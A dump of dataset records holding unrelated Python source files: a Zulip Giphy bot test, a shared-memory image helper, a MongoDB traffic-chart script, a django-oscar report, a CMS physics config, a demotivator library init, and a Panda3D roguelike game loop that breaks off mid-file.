+{"seq_id":"471125642","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport json\n\nfrom unittest.mock import patch\nfrom requests.exceptions import HTTPError, ConnectionError\n\nfrom zulip_bots.test_lib import BotTestCase\n\nclass TestGiphyBot(BotTestCase):\n bot_name = \"giphy\"\n\n def test_normal(self):\n bot_response = '[Click to enlarge]' \\\n '(https://media4.giphy.com/media/3o6ZtpxSZbQRRnwCKQ/giphy.gif)' \\\n '[](/static/images/interactive-bot/giphy/powered-by-giphy.png)'\n\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_normal'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'Hello'},\n response = {'content': bot_response},\n expected_method='send_reply'\n )\n\n def test_no_result(self):\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_no_result'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'world without zulip'},\n response = {'content': 'Sorry, I don\\'t have a GIF for \"world without zulip\"! :astonished:'},\n expected_method='send_reply'\n )\n\n def test_403(self):\n with self.mock_config_info({'key': '12345678'}), \\\n self.mock_http_conversation('test_403'), \\\n self.assertRaises(HTTPError):\n self.initialize_bot()\n mock_message = {'content': 'Hello'}\n # Call the native handle_message here, since we don't want to assert a response,\n # but an exception.\n self.message_handler.handle_message(message={'content': 'Hello'},\n bot_handler=self.mock_bot_handler)\n\n def test_connection_error(self):\n with self.mock_config_info({'key': '12345678'}), \\\n patch('requests.get', side_effect=ConnectionError()), \\\n patch('logging.warning'):\n self.initialize_bot()\n self.assert_bot_response(\n message = {'content': 'world without chocolate'},\n response = {'content': ('Uh oh, sorry :slightly_frowning_face:, I '\n 'cannot process your request right now. But, '\n 'let\\'s try again later! :grin:')},\n expected_method='send_reply'\n )\n","sub_path":"zulip_bots/zulip_bots/bots/giphy/test_giphy.py","file_name":"test_giphy.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"91744874","text":"#from multiprocessing import shared_memory\r\nimport iso_numpy\r\nimport numpy\r\nimport SharedArray as sa\r\nimport cv2\r\nimport zmq\r\n\r\nimg_size = 1280*720*3\r\n\r\nshm_size = 1280*720*3*100\r\ntry:\r\n shm = sa.create(\"phase1\", shm_size)\r\nexcept:\r\n print(\"it exist, so we just attach\")\r\n shm = sa.attach(\"phase1\")\r\n\r\nindex_table = shm[0:100]#the beginning of index table\r\nrecord_table = shm[100:500]#the beginning of recotd table\r\ndata = shm[500:-1]#beginning address of the real data part\r\n\r\nport2 = \"5557\"\r\ncontext2 = zmq.Context()\r\nprint(\"Connecting to server...\")\r\nsocket2 = context2.socket(zmq.REQ)\r\nsocket2.connect (\"tcp://localhost:%s\" % port2)\r\n\r\n\r\nclass iso_object:\r\n def __init__(self,index,name = \"np\"):\r\n self.type = name\r\n self.index = index\r\n def __getitem__(self,index):\r\n np_src = shm2np(self.index)\r\n np_dst = np_src[index]\r\n index = get_free_index()\r\n np2shm(index,np_dst)\r\n return iso_object(index)\r\n\r\nclass iso_model:\r\n def __init__(self,index,name = \"pytorch\"):\r\n self.type = name\r\n self.index = index\r\n self.inputshape = self.getinputshape()\r\n def getinputshape(self):\r\n if(self.type == \"keras\"):\r\n socket2.send_string(\"keras.model.inputshape\")\r\n message = socket2.recv()\r\n arg_string = str(self.index)\r\n socket2.send_string(arg_string)\r\n message = socket2.recv().decode(\"utf-8\")\r\n return eval(message)\r\n\r\n\r\ndef shm2np(index):\r\n offset = index*img_size\r\n table_offset = (index)*4\r\n\r\n shape = record_table[table_offset:table_offset+4]\r\n length = shape[3]\r\n flat_arr = data[offset:offset+int(length)]\r\n np_array = numpy.reshape(flat_arr,shape[0:3].astype(numpy.int))\r\n tmp_img = cv2.convertScaleAbs(np_array)\r\n return tmp_img\r\n\r\n# @overload\r\n# def np2shm(iso_numpy):\r\n# index = iso_numpy.index\r\n\r\n# np_array = iso_numpy.np_array\r\n# print(np_array.shape)\r\n# if(len(np_array.shape)==3):\r\n# width,height,dim = np_array.shape\r\n# else:\r\n# width,height = np_array.shape\r\n# dim = 1\r\n\r\n# length = width*height*dim\r\n# flat_arr = np_array.flatten()\r\n# offset = (index)*img_size\r\n# data[offset:offset+length] = flat_arr[0:length]\r\n# table_offset = index*4\r\n# record_table[table_offset] = width\r\n# record_table[table_offset+1] = height\r\n# record_table[table_offset+2] = dim\r\n# record_table[table_offset+3] = length\r\n \r\n# @np2shm.overload\r\ndef np2shm(index,np_array):\r\n print(np_array.shape)\r\n if(len(np_array.shape)==3):\r\n width,height,dim = np_array.shape\r\n else:\r\n width,height = np_array.shape\r\n dim = 1\r\n\r\n length = width*height*dim\r\n flat_arr = np_array.flatten()\r\n offset = (index)*img_size\r\n data[offset:offset+length] = flat_arr[0:length]\r\n table_offset = index*4\r\n record_table[table_offset] = width\r\n record_table[table_offset+1] = height\r\n record_table[table_offset+2] = dim\r\n record_table[table_offset+3] = length\r\n\r\n\r\ndef get_free_index():\r\n k = 0\r\n index_table = shm[0:100]\r\n while(k < 100):\r\n if(index_table[k]==0):\r\n index_table[k]=1\r\n print(\"index: \"+str(k)+\" found\")\r\n return k\r\n k = k + 1\r\n print(\"cannot find free index\")\r\n return -1\r\n\r\n\r\ndef free_index(shm_name,index):\r\n shm = sa.attach(shm_name)\r\n shm[index] = 0 \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# class shmem_record():\r\n# def __init__(self,width,height,dimension):\r\n# self.width = width\r\n# self.height = height\r\n# self.dimension = dimension\r\n# self.length = width*height*dimension\r\n\r\n\r\n\r\n\r\n# class shm_phase():\r\n# def __init__(self,shm_name):\r\n# self.name = shm_name #name of the shared memory\r\n# self.size = 1280*720*3*100 #default size of shared memory\r\n# self.shm = sa.create(shm_name, self.size) #shared memory object\r\n# self.phase = 0 # represent the which phase this shared memory is for\r\n# self.connect_status = True #True if shared meem is connected\r\n \r\n# self.index_table = self.shm[0:100]#the beginning of index table\r\n# self.record_table = self.shm[100:500]#the beginning of recotd table\r\n# self.data = self.shm[500:-1]#beginning address of the real data part\r\n\r\n\r\n# def create(self,shm_name):\r\n# if(self.connect_status is False):\r\n# self.shm = sa.create(shm_name, size=self.size)\r\n# self.connect_status = True\r\n# self.name = shm_name\r\n# else:\r\n# print(\"shared memory has been created\")\r\n\r\n# def connect(self):\r\n# if(self.connect_status is True):\r\n# return self.shm\r\n# else:\r\n# self.shm = sa.attach(self.name)\r\n# self.connect_status = True\r\n# return self.shm\r\n \r\n# def disconnect(self):\r\n# # self.index_table.release()\r\n# # self.record_table.release()\r\n# # self.data.release()\r\n# # self.shm.close()\r\n# # self.shm.unlink()\r\n# self.connect_status = False\r\n\r\n# def np2shm(self,iso_numpy):\r\n\r\n# index = iso_numpy.index\r\n\r\n# np_array = iso_numpy.np_array\r\n# print(type(np_array))\r\n# width,height,dim = np_array.shape\r\n# length = width*height*dim\r\n# flat_arr = np_array.flatten()\r\n\r\n# offset = (index)*img_size\r\n# self.data[offset:offset+length] = flat_arr[0:length]\r\n\r\n# table_offset = index*4\r\n# self.record_table[table_offset] = width\r\n# self.record_table[table_offset+1] = height\r\n# self.record_table[table_offset+2] = dim\r\n# self.record_table[table_offset+3] = length\r\n# print(\"np2shm\")\r\n# print(self.record_table[0:4])\r\n \r\n# def shm2np(self,index):\r\n# offset = index*img_size\r\n# table_offset = (index)*4\r\n# print(\"shm2np\")\r\n# print(self.record_table[0:4])\r\n# shape = self.record_table[table_offset:table_offset+4]\r\n# print(shape)\r\n# length = shape[3]\r\n\r\n# flat_arr = self.data[offset:offset+int(length)]\r\n# np_array = numpy.reshape(flat_arr,shape[0:3].astype(numpy.int))\r\n# print(\"aaaaaa\")\r\n# print(len(np_array))\r\n# tmp_img = cv2.convertScaleAbs(np_array)\r\n# return tmp_img\r\n\r\n# def get_free_index(self):\r\n# k = 0\r\n# while(k < 100):\r\n# if(self.index_table[k]==0):\r\n# self.index_table[k]=1\r\n# return k\r\n# k = k + 1\r\n# print(\"cannot find free index\")\r\n# return -1\r\n \r\n# def free_index(self,index):\r\n# self.index_table[index]=0\r\n \r\n# def __del__(self):\r\n# sa.delete(self.name)\r\n# self.disconnect()\r\n\r\n\r\n","sub_path":"code/IsoPhase_lib/iso_main.py","file_name":"iso_main.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"650634683","text":"\"\"\" An example of how to insert a document \"\"\"\nimport os\nimport sys\nfrom pymongo import MongoClient\nfrom pymongo.errors import ConnectionFailure\nimport pandas as pd\nimport pymongo\nimport chart_studio.plotly as py\nimport plotly.graph_objs as go\nimport pytz\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\n\n\ndef save2rabbitmq(doc):\n z = {'dt': doc['dt'],\n 'distance': doc['result']['taxi']['distance'],\n 'duration': doc['result']['taxi']['duration'],\n 'traffic_condition': doc['result']['traffic_condition'],\n 'distance4': doc['result']['routes'][0]['steps'][4]['distance'],\n 'duration': doc['result']['routes'][0]['steps'][4]['duration'],\n 'traffic_condition': doc['result']['routes'][0]['steps'][4]['traffic_condition']\n }\n print(z)\n\n\ndef save2mongo(dbname, collection, doc):\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n c = MongoClient(os.getenv('DATABASE_URL'))\n print(\"cloud\")\n else:\n c = MongoClient(\n \"mongodb://user1:password1@localhost:27017/\" + dbname)\n print(\"local\")\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c[dbname]\n dbh[collection].insert(doc)\n print(\"Successfully inserted document: %s\" % doc)\n # save2rabbitmq(doc)\n\n\ndef findlast2dayLastYear(collection, title, normalDuration, years_delta, days_delta):\n normalDuration = float(normalDuration)\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n db_url = os.getenv('DATABASE_URL')\n c = MongoClient(db_url)\n print(\"cloud \" + collection)\n else:\n c = MongoClient(\"mongodb://user1:password1@localhost:27017/testdb\")\n print(\"local \" + collection)\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c.get_database()\n\n tz = pytz.timezone('Asia/Shanghai')\n fmt_long = \"%Y-%m-%d %H:%M:%S\"\n dt2 = datetime.now(tz)\n print(dt2)\n title_time = dt2.strftime(fmt_long)\n dt2 = dt2.replace(hour=0, minute=0, second=0,\n microsecond=0) # Returns a copy\n print(dt2)\n dt1_start = dt2 + \\\n relativedelta(years=years_delta) + relativedelta(days=days_delta)\n print(dt1_start)\n dt1_end = dt1_start + relativedelta(days=1)\n print(dt1_end)\n\n utc = pytz.timezone('UTC')\n local_timezone = pytz.timezone('Asia/Shanghai')\n\n today = []\n z = dbh[collection] \\\n .find({\"dt\": {\"$gt\": dt2}},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt)\n duration = doc['duration'] / normalDuration\n shanghai_dt = loc_dt.astimezone(local_timezone)\n today.append({'dt': shanghai_dt.strftime(\n fmt_long), 'duration': duration})\n\n yesterday = []\n z = dbh[collection] \\\n .find({\"$and\": [{\"dt\": {\"$gt\": dt1_start}}, {\"dt\": {\"$lt\": dt1_end}}]},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt) + relativedelta(years=-\n years_delta) + relativedelta(days=-days_delta)\n duration = doc['duration'] / normalDuration\n shanghai_dt = loc_dt.astimezone(local_timezone)\n yesterday.append(\n {'dt': shanghai_dt.strftime(fmt_long), 'duration': duration})\n\n print(\"Successfully retrieved document: %d\" % z.count(True))\n # https://docs.mongodb.com/manual/reference/method/cursor.count/#cursor.count\n # applySkipLimit\n myplotly(yesterday, today, collection, title, title_time, True)\n\n\ndef findlast2dayYesterday(collection, title, normalDuration):\n normalDuration = float(normalDuration)\n try:\n hostname = os.getenv('HOSTNAME')\n # hostname = 'x'\n if hostname:\n db_url = os.getenv('DATABASE_URL')\n c = MongoClient(db_url)\n print(\"cloud \" + collection)\n else:\n c = MongoClient(\"mongodb://user1:password1@localhost:27017/testdb\")\n print(\"local \" + collection)\n except ConnectionFailure as e:\n sys.stderr.write(\"Could not connect to MongoDB: %s\" % e)\n sys.exit(1)\n dbh = c.get_database()\n\n tz = pytz.timezone('Asia/Shanghai')\n fmt_long = \"%Y-%m-%d %H:%M:%S\"\n dt2 = datetime.now(tz)\n print(dt2)\n title_time = dt2.strftime(fmt_long)\n dt2 = dt2.replace(hour=0, minute=0, second=0,\n microsecond=0) # Returns a copy\n print(dt2)\n dt1 = dt2 + relativedelta(days=-1)\n print(dt1)\n\n utc = pytz.timezone('UTC')\n local_timezone = pytz.timezone('Asia/Shanghai')\n\n today = []\n yesterday = []\n z = dbh[collection] \\\n .find({\"dt\": {\"$gt\": dt1}},\n projection={\"dt\": 1, \"duration\": 1, \"traffic_condition\": 1}) \\\n .sort(\"dt\", pymongo.ASCENDING)\n for doc in z:\n dt = doc['dt']\n loc_dt = utc.localize(dt)\n duration = doc['duration']/normalDuration\n if loc_dt < dt2:\n shanghai_dt = loc_dt.astimezone(local_timezone)\n shanghai_dt = shanghai_dt + relativedelta(days=1)\n yesterday.append(\n {'dt': shanghai_dt.strftime(fmt_long), 'duration': duration})\n else:\n shanghai_dt = loc_dt.astimezone(local_timezone)\n today.append({'dt': shanghai_dt.strftime(\n fmt_long), 'duration': duration})\n\n print(\"Successfully retrieved document: %d\" % z.count(True))\n # https://docs.mongodb.com/manual/reference/method/cursor.count/#cursor.count\n # applySkipLimit\n myplotly(yesterday, today, collection, title, title_time, False)\n\n\ndef myplotly(df1, df2, collection, title, max_dt, isLastYear):\n df1 = pd.DataFrame(df1)\n df2 = pd.DataFrame(df2)\n # https://plot.ly/python/line-and-scatter/\n # Line and Scatter Plots\n # mode=markers,lines+markers,lines\n\n name = u'昨天拥堵指数'\n if isLastYear:\n name = u'去年拥堵指数'\n\n trace1 = go.Scatter(\n x=df1['dt'],\n y=df1['duration'],\n name=name,\n line={\"dash\": 'dot'},\n marker={\"color\": 'rgb(0,0,255)'}\n )\n trace2 = go.Scatter(\n x=df2['dt'],\n y=df2['duration'],\n name=u'今天拥堵指数',\n line={\"width\": 4},\n marker={\"color\": 'rgb(0,255,0)'}\n )\n data = [trace1, trace2]\n layout = go.Layout(\n title=title + max_dt\n )\n fig = go.Figure(data=data, layout=layout)\n url = py.plot(fig, filename=collection,\n fileopt='overwrite', auto_open=False)\n print(url)\n\n\ndef main():\n user_doc = {\n \"username\": \"janedoe\",\n \"firstname\": \"Jane\",\n \"surname\": \"Doe\",\n \"dateofbirth\": datetime(1975, 1, 1),\n \"email\": \"janedoe74@example.com\",\n \"score\": 0\n }\n save2mongo('baidu', 'mycoll', user_doc)\n\n\nif __name__ == \"__main__\":\n years_delta = os.getenv('YEARS_DELTA')\n days_delta = os.getenv('DAYS_DELTA')\n findlast2dayLastYear(sys.argv[1], sys.argv[2],\n sys.argv[3], int(years_delta), int(days_delta))\n","sub_path":"scripts/generateChart.py","file_name":"generateChart.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"82202832","text":"import csv\n\nfrom oscar.core.loading import import_module\nimport_module('reports.reports', ['ReportGenerator'], locals())\nimport_module('order.models', ['Order'], locals())\n\n\nclass OrderReportGenerator(ReportGenerator):\n \n filename_template = 'orders-%s-to-%s.csv'\n code = 'order_report'\n description = \"Orders placed\"\n \n def generate(self, response):\n orders = Order._default_manager.filter(\n date_placed__gte=self.start_date\n ).filter(date_placed__lt=self.end_date)\n \n writer = csv.writer(response)\n header_row = ['Order number',\n 'User',\n 'Total incl. tax',\n 'Date placed',]\n writer.writerow(header_row)\n for order in orders:\n row = [order.number, order.user, order.total_incl_tax, order.date_placed]\n writer.writerow(row)\n \n def is_available_to(self, user):\n return user.is_staff and user.has_perm('order.can_view')","sub_path":"oscar/apps/order/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"78634403","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.ParameterSet.VarParsing as VarParsing\n\nimport subprocess\nimport sys\n\noptions = VarParsing.VarParsing()\n\noptions.register('globalTag',\n '94X_dataRun2_ReReco_EOY17_v2', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"Global Tag\")\n\noptions.register('nEvents',\n 50000, #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.int,\n \"Maximum number of processed events\")\n\noptions.register('eosInputFolder',\n '/store/data/Run2017F/SingleMuon/RAW-RECO/ZMu-17Nov2017-v1/00000/', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"EOS folder with input files\")\n\noptions.register('outputFileName',\n './muonPOGShowers.root', #default value\n VarParsing.VarParsing.multiplicity.singleton,\n VarParsing.VarParsing.varType.string,\n \"Folder and name ame for output ntuple\")\n\noptions.parseArguments()\n\nprocess = cms.Process(\"MUONSHOWERS\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\n\nprocess.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.nEvents))\n\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_38T_cff\")\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\n\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_condDBv2_cff')\n\nprocess.GlobalTag.globaltag = cms.string(options.globalTag)\n\nprocess.source = cms.Source(\"PoolSource\",\n \n fileNames = cms.untracked.vstring(),\n secondaryFileNames = cms.untracked.vstring()\n\n)\n\nprocess.TFileService = cms.Service(\"TFileService\", \n fileName = cms.string(\"muonShower.root\")\n )\n\nfiles = subprocess.check_output([ \"/afs/cern.ch/project/eos/installation/0.3.15/bin/eos.select\", \"ls\", options.eosInputFolder ])\nprocess.source.fileNames = [options.eosInputFolder+\"/\"+f for f in files.split() ] \n\nprocess.load('Configuration.StandardSequences.RawToDigi_cff')\n\nprocess.load(\"MuonShowers.Tools.muonShowerProducer_cfi\")\nprocess.load(\"MuonShowers.Tools.muonShowerTest_cfi\")\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = cms.untracked.vstring('keep *'),\n fileName = cms.untracked.string(options.outputFileName)\n )\n\nprocess.muonShowersPath = cms.Path(process.muonDTDigis + process.muonShowerProducer + process.muonShowerTest)\n#process.outPath = cms.EndPath(process.out)\n","sub_path":"Tools/test/muonShowers_cfg.py","file_name":"muonShowers_cfg.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"59814886","text":"import requests\n\nfrom .demcreate import demcreate\nfrom .arrangedem import arrangedem\nfrom .quote import quote\nfrom .text_gen import text_gen\n\nversion = requests.get(\n 'https://raw.githubusercontent.com/infqq/simpledemotivators/master/simpledemotivators/version.txt'\n ).text.splitlines()\n\nif version[0] != '1.8.0':\n print(\n f'[SimpleDemotivators] Данная версия библиотеки устарела, обновитесь до v{version[0]} с GitHub\\nИзменения: {version[1]}')\nelse:\n print(\n f'SimpleDemotivators v{version[0]} started, version actual.')\n\n__all__ = (\n 'demcreate',\n 'arrangedem',\n 'quote',\n 'text_gen'\n)","sub_path":"simpledemotivators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"592157389","text":"import asyncio\nfrom math import sin\nfrom sys import exit\nfrom random import choice, randint\nfrom direct.showbase.ShowBase import *\nfrom direct.filter.CommonFilters import CommonFilters\nfrom panda3d.core import ClockObject, WindowProperties, DirectionalLight\nfrom .readfile import cfgdict\nfrom .map import Map\nfrom .inputs import Inputs\nfrom .wireframify import makeWireframe\nfrom .player import Player\nfrom .hud import HUD\nfrom .tools import makeInstance\nfrom .data import getParts, getPartsColors\nfrom .items import items\nfrom direct.showbase.Transitions import Transitions\n\nclass Game(ShowBase):\n\tdef __init__(self):\n\t\tShowBase.__init__(self)\n\t\tself.cfg = cfgdict(\"data/default_config.cfg\")\n\t\tglobalClock.setMode(ClockObject.MLimited)\n\t\tglobalClock.setFrameRate(int(self.cfg[\"general\"][\"framerate\"]))\n\t\t#base.setFrameRateMeter(int(self.cfg[\"general\"][\"debug\"]))\n\t\tself.props = WindowProperties()\n\t\tself.props.setSize(tuple(self.cfg[\"general\"][\"resolution\"]))\n\t\tself.props.setFullscreen(int(self.cfg[\"general\"][\"fullscreen\"]))\n\t\tself.props.setCursorHidden(True)\n\t\tself.fullscreen = int(self.cfg[\"general\"][\"fullscreen\"])\n\t\t#props.setMouseMode(WindowProperties.M_relative)\n\t\tbase.win.requestProperties(self.props)\n\t\tbase.disableMouse()\n\t\tbase.win.setClearColor((0,0,0,0))\n\t\tself.inputs = Inputs(self.cfg[\"key\"])\n\n\t\t#cats=[\"mainmenu\", \"parts\", \"enemies\", \"items\"]\n\t\t#for cat in cats: makeWireframe(cat)\n\n\t\tself.hud = HUD(self)\n\n\t\tself.transition = Transitions(loader)\n\t\tself.parts_models = getParts(\"data/models/egg/parts/parts\")\n\t\tself.enemy_models = getParts(\"data/models/egg/enemies/enemies\")\n\t\tself.item_models = getParts(\"data/models/egg/items/items\")\n\n\t\tsounds = [\n\t\t\t\"break\", \"error\", \"explosion\", \"hit_a\", \"hit_b\", \"hit_c\", \"scare\",\n\t\t\t\"select_a\", \"select_b\", \"splurt_a\", \"splurt_b\", \"swallow\",\n\t\t\t\"step_enemy_a\", \"step_enemy_b\", \"step_enemy_c\", \"step_player\", \"turn\",\n\t\t\t\"projectile_a\", \"projectile_b\", \"projectile_c\",\n\t\t]\n\t\tself.sounds = {}\n\t\tfor sound in sounds:\n\t\t\tself.sounds[sound] = loader.loadSfx(\"data/sound/\"+sound+\".wav\")\n\t\tself.sounds[\"step_player\"].setVolume(0.3)\n\t\tself.act = False\n\t\tif self.cfg[\"general\"][\"fx\"] == 1:\n\t\t\trender.setShaderAuto()\n\t\t\taspect2d.setShaderAuto()\n\t\t\tfilters = CommonFilters(base.win, base.cam)\n\t\t\tfilters.setBloom(blend=(0.1,0.1,0.1,0.0), mintrigger=0.0, maxtrigger=0.1, desat=0.0, intensity=0.6, size=\"small\")\n\t\t#self.startGame()\n\n\tdef startGame(self):\n\t\tself.hud.output.append(\"...\")\n\t\tself.hud.output.append(\"You wake up, head on the keyboard.\")\n\t\tself.hud.output.append(\"Where is everybody?\")\n\t\trender.node().removeAllChildren()\n\t\tself.mode = \"game\"\n\t\tself.delay = 0\n\t\tself.map = Map(self, 1)\n\t\tself.player = Player(self.map.start[0], self.map.start[1], 2)\n\t\tself.transition.setFadeColor(0, 0, 0)\n\t\tself.transition.fadeIn(2)\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\tself.actions = []\n\t\tbase.camera.setHpr(0,0,0)\n\t\tbase.camera.setPos(0,0,0)\n\t\tdrinks = [\"red\", \"yellow\", \"orange\", \"green\", \"blue\", \"purple\"]\n\t\ttypes = [\"health\", \"cure\", \"poison\", \"blind\", \"improve\", \"warmth\"]\n\t\tself.drinks = {}\n\t\tfor drink in drinks:\n\t\t\trt = choice(types)\n\t\t\ttypes.remove(rt)\n\t\t\tself.drinks[drink] = [rt, False]\n\t\trender.setLight(dn)\n\n\tdef nextLevel(self):\n\t\trender.node().removeAllChildren()\n\t\trender.hide()\n\t\tself.transition.setFadeColor(0, 0, 0)\n\t\tself.transition.fadeOut(1)\n\t\tself.delay = 0\n\t\tself.actions = []\n\t\tself.map = Map(self, self.map.level+1)\n\t\tself.hud.output.append(\"You reach the \" + str(20-self.map.level) + \"th floor.\")\n\t\tself.player.place = [self.map.start[0], self.map.start[1]-1, 2]\n\t\tself.player.prev_place = self.player.place[:]\n\t\tself.player.pos = [self.map.start[0], self.map.start[1]-1]\n\t\trender.show()\n\t\tself.player.camera.node.reparentTo(render)\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\trender.setLight(dn)\n\t\tself.transition.fadeIn(1)\n\t\tself.mode = \"game\"\n\n\tdef mainMenu(self, task):\n\t\tif self.running:\n\t\t\tself.mcp[3]+=1\n\t\t\tself.mcp[2] = 8 + (sin(self.mcp[3]/50)*7)\n\t\t\tbase.camera.setPos(self.mcp[0], self.mcp[1], self.mcp[2])\n\t\t\tself.buildingmodel[\"tower\"][0].setHpr(self.mcp[3],0,0)\n\t\t\tself.buildingmodel[\"tower\"][1].setHpr(self.mcp[3],0,0)\n\t\t\tif self.inputs.buttons[\"quit\"]:\n\t\t\t\tself.running = False\n\t\t\tif self.inputs.buttons[\"stats\"]:\n\t\t\t\tself.inputs.buttons[\"stats\"] = False\n\t\t\t\tself.bgsong.stop()\n\t\t\t\tself.sounds[\"select_b\"].play()\n\t\t\t\tbase.camera.setPos(0,0,0)\n\t\t\t\tself.hud.loadGameHud()\n\t\t\t\tself.startGame()\n\t\t\t\tself.bgsong = loader.loadSfx(\"data/music/LEVEL1.ogg\")\n\t\t\t\tself.bgsong.setVolume(0.3)\n\t\t\t\tself.bgsong.setLoop(True)\n\t\t\t\tself.bgsong.play()\n\t\t\t\tself.taskMgr.add(self.loop, \"main_loop\")\n\t\t\t\treturn False\n\t\t\treturn task.cont\n\t\tprint(\"bye!\")\n\t\texit()\n\n\tdef load(self):\n\t\tself.running = True\n\t\tself.actions = []\n\t\tself.bgsong = loader.loadSfx(\"data/music/THEME.ogg\")\n\t\tself.bgsong.setVolume(0.5)\n\t\tself.bgsong.setLoop(True)\n\t\tself.bgsong.play()\n\n\t\tself.buildingmodel = getParts(\"data/models/egg/mainmenu/mainmenu\")\n\t\tself.buildingmodel[\"tower\"][0].reparentTo(render)\n\t\tself.buildingmodel[\"tower\"][1].reparentTo(render)\n\n\t\td = DirectionalLight(\"d\")\n\t\tdn = render.attachNewNode(d)\n\t\trender.setLight(dn)\n\t\tself.mcp = [0,-20,8, 1200]\n\t\tself.taskMgr.add(self.mainMenu, \"main_menu\")\n\n\tdef loop(self, task):\n\t\tif self.running:\n\t\t\tself.hud.update()\n\t\t\tif self.mode == \"game\":\n\t\t\t\tif self.inputs.buttons[\"quit\"]:\n\t\t\t\t\tself.running = False\n\t\t\t\tif self.player.stats.status == \"Dying\":\n\t\t\t\t\tself.hud.output.append(\"You died.\")\n\t\t\t\t\tself.mode = \"gameover\"\n\t\t\t\t\tself.sounds[\"explosion\"].play()\n\t\t\t\t\ttaskMgr.add(die())\n\t\t\t\telse:\n\t\t\t\t\tself.delay -= 1\n\t\t\t\t\tif self.delay <= 0:\n\t\t\t\t\t\tself.delay = 0\n\t\t\t\t\t\tif len(self.actions) > 0:\n\t\t\t\t\t\t\tfor action in self.actions:\n\t\t\t\t\t\t\t\ta = action[0](action[1])\n\t\t\t\t\t\t\t\tif a == 1:\n\t\t\t\t\t\t\t\t\tself.actions.remove(action)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.input()\n\t\t\t\t\t\tself.update()\n\t\t\telif self.mode == \"gameover\":\n\t\t\t\tbase.camera.setH(base.camera.getH()+2)\n\t\t\t\tbase.camera.setZ(base.camera.getZ()-0.001)\n\t\t\t# Hud input, choices, etc.\n\t\t\telif self.mode == \"inventory\":\n\t\t\t\tclose = False\n\t\t\t\tif self.inputs.buttons[\"return\"]:\n\t\t\t\t\tclose = True\n\t\t\t\telse:\n\t\t\t\t\tabc = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n\t\t\t\t\tcc = 100\n\t\t\t\t\tif not self.inputs.raw_key == None:\n\t\t\t\t\t\tif self.inputs.raw_key in abc:\n\t\t\t\t\t\t\tfor l, letter in enumerate(abc):\n\t\t\t\t\t\t\t\tif self.inputs.raw_key == letter:\n\t\t\t\t\t\t\t\t\tcc = l\n\t\t\t\t\t\tif cc < len(self.hud.choices):\n\t\t\t\t\t\t\titem = self.hud.choices[cc]\n\t\t\t\t\t\t\tif self.hud.verb == \"inventory\":\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\telif self.hud.verb == \"drop\":\n\t\t\t\t\t\t\t\tf = self.player.drop(item)\n\t\t\t\t\t\t\t\tif f: self.act = True\n\t\t\t\t\t\t\telif self.hud.verb == \"throw\":\n\t\t\t\t\t\t\t\tself.player.throw(item)\n\t\t\t\t\t\t\t\tself.act = True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tf = self.hud.choices[cc].use(self.player)\n\t\t\t\t\t\t\t\tif f: self.act = True\n\t\t\t\t\t\t\tclose = True\n\t\t\t\tif close:\n\t\t\t\t\tself.mode = \"game\"\n\t\t\t\t\tself.hud.inventory[0].setText(\"\")\n\t\t\t\t\tself.hud.choices = 